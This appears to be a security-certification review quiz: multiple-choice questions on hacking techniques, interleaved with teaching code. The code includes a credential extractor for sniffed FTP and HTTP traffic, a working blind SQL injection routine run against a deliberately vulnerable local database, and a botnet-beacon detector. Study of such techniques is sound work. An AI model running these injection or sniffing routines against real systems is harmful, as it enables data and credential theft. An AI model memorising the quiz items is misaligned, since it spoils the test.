FALLOS CE 2
Test title: FALLOS CE 2. Description: Exam review.

Attacker Lauren has gained the credentials of an organization's internal server system, and she was often logging in at irregular times to monitor network activity. The organization was suspicious about the login times and appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited. In which incident handling and response (IH&R) phase did Robert determine these details?
- Incident triage
- Eradication
- Preparation
- Incident recording and assignment

Clark is a professional hacker. He created and configured multiple domains pointing to the same host so that he could switch quickly between the domains and avoid detection. Identify the adversary behavior in the above scenario.
- Use of command-line interface
- Data staging
- Unspecified proxy activities
- Use of DNS tunneling

Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of users who were currently accessing the network. What type of vulnerability assessment did Morris perform on the target organization?
- Internal assessment
- External assessment
- Credentialed assessment
- Passive assessment

David is a security professional working in an organization, and he is implementing a vulnerability management program to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes to vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability management life cycle is David currently in?
- Remediation
- Risk assessment
- Verification
- Vulnerability scan
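Morris's assessment above is passive because it only listens. The following added example (not part of the original quiz) shows what a passive assessment can and cannot produce from captured traffic: active hosts, a service inventory with banners, and users authenticating in the clear. The capture is a constructed list of packet summaries standing in for a sniffer feed; nothing is ever sent, which is why modifying or replaying traffic is outside what this code can do (the point of the passive-sniffing question that follows).

```python
"""Passive network assessment: what listening alone reveals.

Added example, not part of the original quiz. CAPTURE is a constructed list of
packet summaries standing in for a sniffer feed; no packet is ever transmitted.
"""
import base64
import ipaddress
import re

# Constructed capture: (src, sport, dst, dport, proto, payload)
CAPTURE = [
    ("10.0.0.20", 21, "10.0.0.5", 51000, "tcp", b"220 ProFTPD 1.3.5 Server ready\r\n"),
    ("10.0.0.5", 51000, "10.0.0.20", 21, "tcp", b"USER alice\r\n"),
    ("10.0.0.20", 21, "10.0.0.5", 51000, "tcp", b"331 Password required for alice\r\n"),
    ("10.0.0.5", 51000, "10.0.0.20", 21, "tcp", b"PASS s3cret\r\n"),
    ("10.0.0.7", 40222, "10.0.0.30", 80, "tcp",
     b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n"),
    ("10.0.0.30", 80, "10.0.0.7", 40222, "tcp",
     b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n\r\n"),
    ("10.0.0.9", 33000, "10.0.0.20", 22, "tcp", b""),
    ("10.0.0.20", 22, "10.0.0.9", 33000, "tcp", b"SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5\r\n"),
    ("10.0.0.9", 5353, "224.0.0.251", 5353, "udp", b""),
]

# Assumed well-known port table used for service guesses when no banner is seen
SERVICE_BY_PORT = {21: "ftp", 22: "ssh", 25: "smtp", 53: "dns", 80: "http", 443: "https"}


def active_hosts(capture):
    """Addresses that transmitted at least one frame. A silent host is invisible
    to a passive assessment; only active probing could reveal it."""
    return sorted({src for src, *_ in capture}, key=ipaddress.ip_address)


def service_inventory(capture):
    """Map (host, port, proto) -> banner or service guess.
    Replies from a well-known port carry banners (first line or Server header);
    requests to a well-known port give at least a service guess."""
    guesses, banners = {}, {}
    for src, sport, dst, dport, proto, payload in capture:
        if sport in SERVICE_BY_PORT and payload:
            hdr = re.search(rb"^Server: (.+?)\r\n", payload, re.M)
            line = hdr.group(1) if hdr else payload.split(b"\r\n")[0]
            banners.setdefault((src, sport, proto), line.decode("ascii", "replace"))
        if dport in SERVICE_BY_PORT:
            guesses[(dst, dport, proto)] = SERVICE_BY_PORT[dport]
    return {**guesses, **banners}          # a real banner beats a port guess


def cleartext_credentials(capture):
    """(protocol, server, user, password) for protocols that authenticate in the clear."""
    found, pending_user = [], {}
    for src, _sport, dst, dport, _proto, payload in capture:
        if dport == 21:                      # FTP: USER and PASS arrive in separate segments
            if payload.startswith(b"USER "):
                pending_user[(src, dst)] = payload[5:].strip().decode()
            elif payload.startswith(b"PASS "):
                user = pending_user.pop((src, dst), "?")
                found.append(("ftp", dst, user, payload[5:].strip().decode()))
        elif dport == 80:                    # HTTP Basic: base64, not encryption
            m = re.search(rb"^Authorization: Basic (\S+)", payload, re.M)
            if m:
                user, _, pw = base64.b64decode(m.group(1)).decode().partition(":")
                found.append(("http-basic", dst, user, pw))
    return found


def active_users(capture):
    """Users seen authenticating on the network, the list Morris obtained."""
    return sorted({cred[2] for cred in cleartext_credentials(capture)})


if __name__ == "__main__":
    print("hosts:", active_hosts(CAPTURE))
    for key, svc in service_inventory(CAPTURE).items():
        print("service:", key, svc)
    print("users:", active_users(CAPTURE))
```

Everything here is derived from frames that happened to pass the sniffer; the SSH host is identified only because it answered someone else's connection. Active techniques (probing closed ports, injecting or replaying segments) need a transmitter and are therefore not passive.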
When conducting a penetration test, it is crucial to use all means to get all available information about the target network. One way to do that is by sniffing the network. Which of the following cannot be performed by passive network sniffing?
- Capturing network traffic for further analysis
- Collecting unencrypted information about usernames and passwords
- Modifying and replaying captured network traffic
- Identifying operating systems, services, protocols and devices

You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use?
- inurl
- filetype
- site
- ext

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data into DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication between the victim machine and the C&C server. What technique did John employ to bypass the firewall?
- DNS enumeration
- DNS tunneling method
- DNS cache snooping
- DNSSEC zone walking

Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content to a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What attack technique did Jane employ in the above scenario?
- Session hijacking
- Website mirroring
- Website defacement
- Web cache poisoning

Jim, a professional hacker, targeted an organization that operates critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization's OT network. He used an Nmap command to identify EtherNet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information?
- nmap -Pn -sT -p 102 --script s7-info <Target IP>
- nmap -Pn -sU -p 44818 --script enip-info <Target IP>
- nmap -Pn -sT -p 46824 <Target IP>
- nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p <Port List> <Target IP>

Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response, and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for?
- Out-of-band and boolean-based
- Union-based and error-based
- Time-based and boolean-based
- Time-based and union-based

Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob's ISN. Using this ISN, Samuel sent spoofed packets with Bob's IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob's connection hung, and Samuel was able to communicate with the host machine on behalf of Bob. What type of attack did Samuel perform in the above scenario?
- UDP hijacking
- Forbidden attack
- Blind hijacking
- TCP/IP hijacking

Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle phase is Harry currently executing?
- Cleanup
- Initial intrusion
- Persistence
- Preparation

There are multiple cloud deployment options depending on how isolated a customer's resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operating expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called?
- Community
- Public
- Private
- Hybrid

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve's profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company. What social engineering technique did Steve employ in the above scenario?
- Piggybacking
- Honey trap
- Diversion theft
- Baiting

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?
- Phlashing
- Desynchronization
- Session splicing
- Slowloris attack

While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt's bank account has been accessed, and the password has been changed. What most likely happened?
- Matt's computer was infected with a keylogger
- Matt inadvertently provided the answers to his security questions when responding to the post
- Matt inadvertently provided his password when responding to the post
- Matt's bank account login information was brute forced

Alice needs to send a confidential document to her coworker, Bryan. Their company has a public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature.
- Bryan's private key; Alice's public key
- Bryan's public key; Bryan's public key
- Bryan's public key; Alice's public key
- Alice's public key; Alice's public key

Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that was aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What type of vulnerability assessment did Johnson perform in the above scenario?
- Application assessment
- Wireless network assessment
- Distributed assessment
- Host-based assessment

Andrew is an ethical hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range of a given target network. Which of the following host discovery techniques must he use to perform the given task?
- ACK flag probe scan
- ARP ping scan
- TCP Maimon scan
- UDP scan

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What port scanning technique did Sam use to discover open ports?
- ACK flag probe scan
- IDLE/IPID header scan
- Xmas scan
- TCP Maimon scan

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?
- It is a stateful firewall
- This event does not tell you anything about the firewall
- There is no firewall in place
- It is a non-stateful firewall

Which of the following is a command-line packet analyzer similar to the GUI-based Wireshark?
- ethereal
- tcpdump
- nessus
- jack the ripper

Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer?
- Use a scan tool like Nessus
- Use the built-in Windows Update tool
- Create a disk image of a clean Windows installation
- Check MITRE.org for the latest list of CVE findings

An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a web server in the network's external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive?
- Intrusion Prevention System (IPS)
- Vulnerability scanner
- Protocol analyzer
- Network sniffer

An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What type of vulnerability assessment solution did James employ in the above scenario?
- Tree-based assessment
- Inference-based assessment
- Product-based solutions
- Service-based solutions
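The Jane Smith question above turns on how blind SQL injection works: the attacker never sees data, only whether a query was true or false. The following added example (not from the original quiz) builds a constructed SQLite database with a vulnerable lookup that concatenates the user ID into the statement, recovers a secret column one character at a time through that true/false oracle, and shows that the same loop gets nothing from the parameterised version. Time-based blind injection is the same inference with a delay as the signal instead of a page difference; SQLite has no sleep function, so only the boolean variant is run here.

```python
"""Boolean-based blind SQL injection as a true/false oracle, against SQLite.

Added example, not part of the original quiz. The table, rows and the
vulnerable lookup are constructed; extract_secret() only ever sees a boolean.
"""
import sqlite3

# Alphabet the attacker guesses from; '?' is deliberately excluded (see below)
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"


def build_db():
    """Constructed sample database with one secret worth stealing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "Zx9!"), (2, "jane", "pw")])
    conn.commit()
    return conn


def user_exists_vulnerable(conn, user_id):
    """Vulnerable: the user-supplied id is pasted into the SQL text, so
    '1 AND <condition>' turns the lookup into an oracle for <condition>."""
    row = conn.execute(f"SELECT 1 FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def user_exists_safe(conn, user_id):
    """Fixed: a bound parameter is a value, never SQL. The whole payload is
    compared against the id column as a literal and simply does not match."""
    row = conn.execute("SELECT 1 FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def extract_secret(oracle, target_id=1, max_len=32):
    """Recover users.secret for target_id one character at a time.
    oracle(payload) -> bool is all the attacker can observe."""
    secret = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"{target_id} AND length(secret) >= {pos}"):
            break                      # the whole value has been read
        for ch in CHARSET:
            # Compare by code point so the payload needs no quotes
            if oracle(f"{target_id} AND unicode(substr(secret, {pos}, 1)) = {ord(ch)}"):
                secret += ch
                break
        else:
            secret += "?"              # character outside CHARSET
    return secret


def demo():
    """Returns (secret via the vulnerable lookup, secret via the fixed lookup)."""
    conn = build_db()
    via_vulnerable = extract_secret(lambda p: user_exists_vulnerable(conn, p))
    via_safe = extract_secret(lambda p: user_exists_safe(conn, p))
    return via_vulnerable, via_safe


if __name__ == "__main__":
    print(demo())
```

Each recovered character costs up to one query per alphabet entry plus one length probe; a real attacker would bisect on the code point instead of scanning linearly, and a time-based variant would replace `user_exists_*` with a check on how long the response took.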
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker?
- Time-based blind SQLi
- Out-of-band SQLi
- Union-based SQLi
- In-band SQLi

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and whether any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?
- nmap -sn -PA <target IP address>
- nmap -sn -PP <target IP address>
- nmap -sn -PS <target IP address>
- nmap -sn -PO <target IP address>

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?
- Use his own private key to encrypt the message
- Use his own public key to encrypt the message
- Use Marie's public key to encrypt the message
- Use Marie's private key to encrypt the message

Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message, and how is Poly validating it?
- Dorian is signing the message with Poly's public key, and Poly will verify that the message came from Dorian by using Dorian's public key
- Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key
- Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian's private key
- Dorian is signing the message with Poly's private key, and Poly will verify that the message came from Dorian by using Dorian's public key

Which of the following Linux commands will resolve a domain name into an IP address?
- host -t soa hackeddomain.com
- host -t ns hackeddomain.com
- host -t a hackeddomain.com
- host -t AXFR hackeddomain.com

Which of the following programs infects the system boot sector and executable files at the same time?
- Stealth virus
- Multipartite virus
- Polymorphic virus
- Macro virus

Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on their walking patterns and implemented this approach in a physical access control. A camera captures people walking and identifies the individuals using Steve's approach. After that, people must present their RFID badges. Both identifications are required to open the door. In this case, we can say:
- The solution implements two authentication factors: physical object and physical characteristic
- Although the approach has two phases, it actually implements just one authentication factor
- The solution will have a high level of false positives
- Biological motion cannot be used to identify people

The collection of potentially actionable, overt, and publicly available information is known as:
- Social intelligence
- Open-source intelligence
- Real intelligence
- Human intelligence

Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by the target company. This includes using logos, formatting, and names of the target company. The phishing message will often use the name of the company CEO, President, or Managers. The time a hacker spends performing research to locate this information about a company is known as:
- Exploration
- Reconnaissance
- Enumeration
- Investigation

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?
- A web server facing the Internet, an application server on the internal network, a database server on the internal network
- All three servers need to face the Internet so that they can communicate between themselves
- A web server and the database server facing the Internet, an application server on the internal network
- All three servers need to be placed internally

An attacker, using a rogue wireless AP, performed an MITM attack and injected HTML code to embed a malicious applet in all HTTP connections. When users accessed any page, the applet ran and exploited many machines. Which one of the following tools did the hacker probably use to inject the HTML code?
- Aircrack-ng
- Ettercap
- Tcpdump
- Wireshark

A company's security policy states that all web browsers must automatically delete their HTTP browser cookies upon terminating. What sort of security breach is this policy attempting to mitigate?
- Attempts by attackers to access passwords stored on the user's computer without the user's knowledge
- Attempts by attackers to determine the user's web browser usage patterns, including when sites were visited and for how long
- Attempts by attackers to access websites that trust the web browser user by stealing the user's authentication credentials
- Attempts by attackers to access the user and password information stored in the company's SQL database

Which of the following is a low-tech way of gaining unauthorized access to systems?
- Eavesdropping
- Scanning
- Sniffing
- Social Engineering

What does a firewall check to prevent particular ports and applications from getting packets into an organization?
- Network layer headers and the session layer port numbers
- Presentation layer headers and the session layer port numbers
- Transport layer port numbers and application layer headers
- Application layer port numbers and the transport layer headers

PGP, SSL, and IKE are all examples of which type of cryptography?
- Hash Algorithm
- Digest
- Secret Key
- Public Key

Which of the following tools is used to analyze the files produced by several packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?
- tcptraceroute
- Nessus
- tcptrace
- OpenVAS

A large mobile telephony and data network operator has a data center that houses network elements. These are essentially large computers running Linux. The perimeter of the data center is secured with firewalls and IPS systems. What is the best security policy concerning this setup?
- Network elements must be hardened with user IDs and strong passwords. Regular security tests and audits should be performed.
- As long as physical access to the network elements is restricted, there is no need for additional measures.
- There is no need for specific security measures on the network elements as long as firewalls and IPS systems exist.
- The operator knows that attacks and downtime are inevitable and should have a backup site.

The configuration allows a wired or wireless network interface controller to pass all traffic it receives to the central processing unit (CPU), rather than passing only the frames that the controller is intended to receive. Which of the following is being described?
- Promiscuous mode
- WEM
- Multicast mode
- Port forwarding

While performing online banking using a web browser, a user receives an email that contains a link to an interesting website. When the user clicks on the link, another web browser session starts and displays a video of cats playing a piano. The next business day, the user receives what looks like an email from his bank, indicating that his bank account has been accessed from a foreign country. The email asks the user to call his bank and verify the authorization of a funds transfer that took place. What web browser-based security vulnerability was exploited to compromise the user?
- Clickjacking
- Cross-Site Scripting
- Cross-Site Request Forgery
- Web form input validation

A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the fourth is a binary file named nc. The FTP server's access logs show that the anonymous user account logged in to the server, uploaded the files, extracted the contents of the tarball, and ran the script using a function provided by the FTP server's software. The ps command shows that the nc file is running as a process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible?
- Directory traversal
- File system permissions
- Brute force login
- Privilege escalation

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines but cannot successfully reach the Internet. When the technician examines the IP address and default gateway, they are both on 192.168.1.0/24. Which of the following has occurred?
- The computer is using an invalid IP address
- The gateway is not routing to a public IP address
- The computer is not using a private IP address
- The gateway and the computer are not on the same network

An attacker is trying to redirect the traffic of a small office. That office is using its own mail server, DNS server and NTP server because of the importance of its work. The attacker gained access to the DNS server and redirected www.google.com to his own IP address. Now when the employees of the office want to go to Google, they are redirected to the attacker's machine. What is the name of this kind of attack?
- Smurf Attack
- DNS spoofing
- MAC Flooding
- ARP Poisoning
Identify the web application attack where attackers exploit vulnerabilities in dynamically generated web pages to inject client-side script into web pages viewed by other users.
- Cross-Site Scripting (XSS)
- SQL injection attack
- LDAP Injection attack
- Cross-Site Request Forgery (CSRF)

You are working as a security analyst in a company XYZ that owns the whole subnet ranges 23.0.0.0/8 and 192.168.0.0/16. While monitoring the data, you find a high number of outbound connections. You see that IPs owned by XYZ (internal) and private IPs are communicating with a single public IP. Therefore, the internal IPs are sending data to the public IP. After further analysis, you find out that this public IP is a blacklisted IP, and the internal communicating devices are compromised. What kind of attack does the above scenario depict?
- Botnet Attack
- Spear Phishing Attack
- Rootkit Attack
- Advanced Persistent Threats

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization's interests and your liabilities as a tester?
- Rules of Engagement
- Non-Disclosure Agreement
- Project Scope
- Service Level Agreement

What does the -oX flag do in an Nmap scan?
- Perform an eXpress scan
- Perform an Xmas scan
- Output the results in truncated format to the screen
- Output the results in XML format to a file

Which of the following is an extremely common IDS evasion technique in the web world?
- Subnetting
- Unicode Characters
- Port Knocking
- Spyware

Which of the following tools performs comprehensive tests against web servers, including dangerous files and CGIs?
- Nikto
- John the Ripper
- Dsniff
- Snort

In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he achieve this?
- Hacking Active Directory
- Shoulder-Surfing
- Privilege Escalation
- Port Scanning

User A is writing a sensitive email message to user B outside the local network. User A has chosen to use PKI to secure his message and ensure only user B can read the sensitive email. At what layer of the OSI model does the encryption and decryption of the message take place?
- Presentation
- Transport
- Application
- Session

An attacker attaches a rogue router to a network. He wants to redirect traffic to a LAN attached to his router as part of a man-in-the-middle attack. What measure on behalf of the legitimate admin can mitigate this attack?
- Make sure that legitimate network routers are configured to run routing protocols with authentication
- Disable all routing protocols and only use static routes
- Redirection of the traffic cannot happen unless the admin allows it explicitly
- Only using OSPFv3 will mitigate this risk

"________ is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent website and luring people there." Fill in the blank with the appropriate choice.
- Evil Twin Attack
- Signal Jamming Attack
- Sinkhole Attack
- Collision Attack

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist's email, and you send her an email changing the source email to her boss's email (boss@company). In this email, you ask for a PDF with information. She reads your email and sends back a PDF with links. You exchange the PDF links with your malicious links (these links contain malware) and send back the modified PDF, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use?
- Piggybacking
- Eavesdropping
- Social engineering
- Tailgating

During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web-enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?
- Packet Filtering
- Application
- Stateful
- Circuit
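The XYZ scenario above (many internal and private addresses all talking to one blacklisted public IP) is the analyst's view of a botnet: infected hosts checking in with a command-and-control server. The following added example (not from the original quiz) runs that analysis over a constructed outbound connection log: it keeps only internal-to-public connections, groups them by destination, flags any destination contacted by several distinct internal sources that is either on a blocklist or contacted on a regular timer (beaconing), and ignores internal-to-internal traffic. The address ranges, blocklist entry and log records are all constructed for the example (the private range is 192.168.0.0/16).

```python
"""Finding C2 traffic from outbound connection records.

Added example, not part of the original quiz. The ranges, blocklist and the
connection log below are constructed to mirror the XYZ scenario.
"""
import ipaddress
import statistics
from collections import defaultdict

# XYZ-owned plus RFC 1918 space counts as "internal" for this analysis (assumed)
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in
                   ("23.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BLOCKLIST = {"203.0.113.77"}          # constructed: documentation range, not a real C2


def _build_constructed_log():
    """Records are (epoch seconds, src, dst, dst_port)."""
    base = 1_700_000_000
    log = []
    # Four bots beacon to the same public address every ~300 s with small jitter
    for i, bot in enumerate(("23.1.2.3", "23.1.2.4", "192.168.5.10", "10.0.0.8")):
        for k in range(4):
            log.append((base + 300 * k + (i + k) % 5, bot, "203.0.113.77", 443))
    # Ordinary browsing: irregular timing, few sources per destination
    log += [(base + 17, "23.1.2.3", "198.51.100.10", 443),
            (base + 412, "192.168.5.10", "198.51.100.10", 443),
            (base + 980, "23.1.2.3", "198.51.100.10", 80),
            (base + 33, "10.0.0.8", "198.51.100.25", 443),
            (base + 90, "23.1.2.9", "23.1.2.10", 445)]       # internal-to-internal
    return sorted(log)


CONNECTIONS = _build_constructed_log()


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_RANGES)


def outbound_by_destination(conns):
    """{public dst: {internal src: [timestamps]}} for internal -> public flows only."""
    groups = defaultdict(lambda: defaultdict(list))
    for ts, src, dst, _port in conns:
        if is_internal(src) and not is_internal(dst):
            groups[dst][src].append(ts)
    return groups


def beacon_score(timestamps):
    """Coefficient of variation of the gaps between connections.
    Near 0 means a fixed timer; human browsing is far noisier. None if too few points."""
    if len(timestamps) < 3:
        return None
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return 0.0 if mean == 0 else statistics.pstdev(gaps) / mean


def find_c2_candidates(conns, min_sources=3, max_cv=0.2):
    """Destinations that several internal hosts contact and that are either
    blocklisted or contacted on a regular beacon interval."""
    findings = []
    for dst, by_src in outbound_by_destination(conns).items():
        scores = [s for s in map(beacon_score, by_src.values()) if s is not None]
        periodic = [s for s in scores if s <= max_cv]
        if len(by_src) >= min_sources and (dst in BLOCKLIST or periodic):
            findings.append({
                "dst": dst,
                "sources": sorted(by_src),        # these hosts need incident handling
                "blocklisted": dst in BLOCKLIST,
                "periodic_sources": len(periodic),
            })
    return findings


if __name__ == "__main__":
    for f in find_c2_candidates(CONNECTIONS):
        print(f)
```

The blocklist match alone would have flagged the destination in the XYZ case; the beacon score is the check that still fires when the C2 address is new, and the list of sources is what goes into the incident record for containment.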